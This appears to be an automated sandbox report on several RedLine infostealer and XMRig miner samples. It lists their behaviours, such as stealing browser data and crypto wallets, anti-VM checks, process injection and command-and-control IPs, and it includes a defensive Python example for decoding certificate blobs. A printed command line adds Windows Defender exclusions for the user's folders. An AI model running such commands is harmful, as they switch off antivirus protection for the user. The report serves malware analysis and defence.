| N/A | ip-api.com | N/A | N/A |
Modifies system certificate store
(The AuthRoot entry below is keyed by SHA-1 thumbprint D1EB23A46D17D68FD92564C2F1F1601764D8E349, and its DER contains the issuer/subject strings "Comodo CA Limited" and "AAA Certificate Services" in plain hex, i.e. the public AAA Certificate Services root. Windows writes AuthRoot\Certificates entries itself through automatic root update the first time a process validates a chain to a root it has not cached, so this signature is consistent with the sample's HTTPS lookups further down and should be read as corroboration of that network activity, not as the sample installing its own trust anchor.)
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de
6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd
030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
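Before accepting a "modifies system certificate store" hit as evidence of a planted trust anchor, decode the Blob value and check that the key name, the stored SHA-1 property and the embedded DER all agree, then read off whose certificate it is. The Python below is an added example, not part of the report: it parses the CryptoAPI property-record layout the hex above follows (each record is a DWORD property id, a DWORD reserved field equal to 1, a DWORD length and the data; 0x20 carries the DER certificate, 0x03 its SHA-1 thumbprint, 0x0B a UTF-16LE friendly name, which in the AuthRoot blob above decodes to C·O·M·O·D·O). It ships with a constructed placeholder blob so it runs offline; pass a thumbprint and the hex copied from the report on the command line to run it against the real entry. The CN scan is a heuristic assumed here, not a full X.509 parser.

```python
"""Decode a CryptoAPI certificate-store registry value (the Blob under
SystemCertificates\\...\\Certificates\\<thumbprint>) and cross-check it the way
an analyst would before calling a "modifies certificate store" hit tampering.
Added example, not part of the sandbox report. Record format: DWORD property
id, DWORD reserved (1), DWORD length, data; 0x20 = DER certificate, 0x03 =
SHA-1 thumbprint, 0x0B = UTF-16LE friendly name. The sample blob is
constructed here around a placeholder DER so the code runs offline."""
from __future__ import annotations

import hashlib
import re
import struct

CERT_SHA1_HASH_PROP_ID = 0x03
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_CERT_PROP_ID = 0x20
OID_COMMON_NAME = bytes.fromhex("0603550403")  # DER-encoded id-at-commonName
# OID followed by a string tag (UTF8/Printable/T61/IA5) and a short-form length
CN_RE = re.compile(re.escape(OID_COMMON_NAME) + rb"([\x0c\x13\x14\x16])([\x00-\x7f])")


def parse_capi_blob(blob: bytes) -> dict[int, bytes]:
    """Walk the property records; raise ValueError on anything malformed."""
    props: dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed record {prop_id:#x} at offset {off - 12}")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def der_common_names(der: bytes) -> list[str]:
    """Heuristic scan for CN attributes (short-form lengths only); not an X.509 parser."""
    out = []
    for m in CN_RE.finditer(der):
        n = m.group(2)[0]
        out.append(der[m.end():m.end() + n].decode("utf-8", "replace"))
    return out


def review_store_entry(key_thumbprint: str, blob: bytes) -> dict:
    """Do the key name, the stored hash and the embedded DER agree, and what is it?"""
    props = parse_capi_blob(blob)
    der = props.get(CERT_CERT_PROP_ID, b"")
    sha1 = hashlib.sha1(der).hexdigest().upper()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le", "replace").rstrip("\x00")
    return {
        "properties": sorted(props),
        "cert_len": len(der),
        "thumbprint": sha1,
        "key_matches_cert": sha1 == key_thumbprint.upper(),
        "stored_hash_matches_cert": stored == sha1,
        "friendly_name": friendly,
        "common_names": der_common_names(der),
    }


def build_capi_blob(props: dict[int, bytes]) -> bytes:
    """Inverse of parse_capi_blob; used here only to construct the sample."""
    return b"".join(struct.pack("<III", pid, 1, len(v)) + v for pid, v in props.items())


def _placeholder_der(cn: str) -> bytes:
    # Constructed stand-in: a SEQUENCE holding one commonName attribute. Not a real certificate.
    cn_b = cn.encode()
    attr = OID_COMMON_NAME + bytes([0x0C, len(cn_b)]) + cn_b
    return bytes([0x30, len(attr)]) + attr


SAMPLE_DER = _placeholder_der("Example Root CA")
SAMPLE_THUMBPRINT = hashlib.sha1(SAMPLE_DER).hexdigest().upper()
SAMPLE_BLOB = build_capi_blob({
    CERT_FRIENDLY_NAME_PROP_ID: "Example".encode("utf-16-le") + b"\x00\x00",
    CERT_SHA1_HASH_PROP_ID: bytes.fromhex(SAMPLE_THUMBPRINT),
    CERT_CERT_PROP_ID: SAMPLE_DER,
})

if __name__ == "__main__":
    import sys
    # Usage: python capi_blob.py <key thumbprint> <hex blob copied from the report>
    if len(sys.argv) == 3:
        print(review_store_entry(sys.argv[1], bytes.fromhex(sys.argv[2])))
    else:
        print(review_store_entry(SAMPLE_THUMBPRINT, SAMPLE_BLOB))
```

A blob whose key name does not match the SHA-1 of the DER it contains, or whose friendly name and CN do not fit the thumbprint, is the case worth escalating; an entry that is internally consistent and names a public root is what automatic root update leaves behind.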
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewHacks.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NewHacks.exe
"C:\Users\Admin\AppData\Local\Temp\NewHacks.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.190.106:443 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| N/A | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| N/A | 8.8.8.8:53 | gfs270n078.userstorage.mega.co.nz | udp |
| N/A | 89.44.168.219:80 | gfs270n078.userstorage.mega.co.nz | tcp |
Files
memory/1104-60-0x00000000000E0000-0x00000000000E1000-memory.dmp
memory/1104-62-0x000000001BD80000-0x000000001BD82000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
32s
Max time network
123s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2208 set thread context of 3660 | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | C:\Users\Admin\AppData\Local\Temp\Setup.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
C:\Users\Admin\AppData\Local\Temp\Setup.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 185.92.73.140:80 | 185.92.73.140 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
Files
memory/2208-114-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
memory/2208-116-0x0000000005C80000-0x0000000005C81000-memory.dmp
memory/2208-117-0x0000000005860000-0x0000000005861000-memory.dmp
memory/2208-118-0x0000000005780000-0x0000000005C7E000-memory.dmp
memory/2208-119-0x0000000005830000-0x0000000005831000-memory.dmp
memory/2208-120-0x0000000005A70000-0x0000000005A91000-memory.dmp
memory/3660-121-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3660-122-0x0000000000418E4E-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
memory/3660-126-0x00000000054F0000-0x00000000054F1000-memory.dmp
memory/3660-127-0x0000000004F50000-0x0000000004F51000-memory.dmp
memory/3660-128-0x0000000004FB0000-0x0000000004FB1000-memory.dmp
memory/3660-129-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
memory/3660-130-0x0000000004EE0000-0x00000000054E6000-memory.dmp
memory/3660-131-0x0000000005260000-0x0000000005261000-memory.dmp
memory/3660-132-0x0000000006160000-0x0000000006161000-memory.dmp
memory/3660-133-0x0000000006860000-0x0000000006861000-memory.dmp
memory/3660-134-0x00000000063E0000-0x00000000063E1000-memory.dmp
memory/3660-136-0x0000000006760000-0x0000000006761000-memory.dmp
memory/3660-138-0x0000000006DB0000-0x0000000006DB1000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210408
Max time kernel
124s
Max time network
165s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Crystal.exe
"C:\Users\Admin\AppData\Local\Temp\Crystal.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 185.252.144.65:4545 | 185.252.144.65 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/1212-60-0x00000000762C1000-0x00000000762C3000-memory.dmp
memory/1212-62-0x0000000000B80000-0x0000000000B81000-memory.dmp
memory/1212-64-0x0000000005710000-0x0000000005711000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
18s
Max time network
120s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Crystal.exe
"C:\Users\Admin\AppData\Local\Temp\Crystal.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | N/A | tcp |
| N/A | 185.252.144.65:4545 | 185.252.144.65 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 52.182.141.63:443 | N/A | tcp |
Files
memory/3904-115-0x00000000773E0000-0x000000007756E000-memory.dmp
memory/3904-116-0x0000000000150000-0x0000000000151000-memory.dmp
memory/3904-118-0x00000000058A0000-0x00000000058A1000-memory.dmp
memory/3904-119-0x0000000005330000-0x0000000005331000-memory.dmp
memory/3904-120-0x0000000005390000-0x0000000005391000-memory.dmp
memory/3904-121-0x00000000053D0000-0x00000000053D1000-memory.dmp
memory/3904-122-0x0000000005290000-0x0000000005896000-memory.dmp
memory/3904-123-0x0000000005640000-0x0000000005641000-memory.dmp
memory/3904-124-0x00000000067B0000-0x00000000067B1000-memory.dmp
memory/3904-125-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
memory/3904-126-0x00000000078E0000-0x00000000078E1000-memory.dmp
memory/3904-127-0x0000000006A80000-0x0000000006A81000-memory.dmp
memory/3904-128-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
memory/3904-129-0x0000000006D80000-0x0000000006D81000-memory.dmp
memory/3904-130-0x0000000006E70000-0x0000000006E71000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
33s
Max time network
83s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 45.14.49.109:54819 | 45.14.49.109 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
Files
memory/368-60-0x0000000075A71000-0x0000000075A73000-memory.dmp
memory/368-61-0x0000000000260000-0x000000000028F000-memory.dmp
memory/368-62-0x0000000000400000-0x0000000002C86000-memory.dmp
memory/368-63-0x0000000003020000-0x000000000303C000-memory.dmp
memory/368-64-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-65-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-66-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-67-0x0000000003310000-0x000000000332A000-memory.dmp
memory/368-68-0x00000000033F0000-0x0000000005C76000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
150s
Max time network
132s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\services32.exe | N/A |
| N/A | N/A | C:\Windows\system32\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Libs\sihost64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.log | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.log | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1424 set thread context of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Windows\System32\cmd.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe"
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
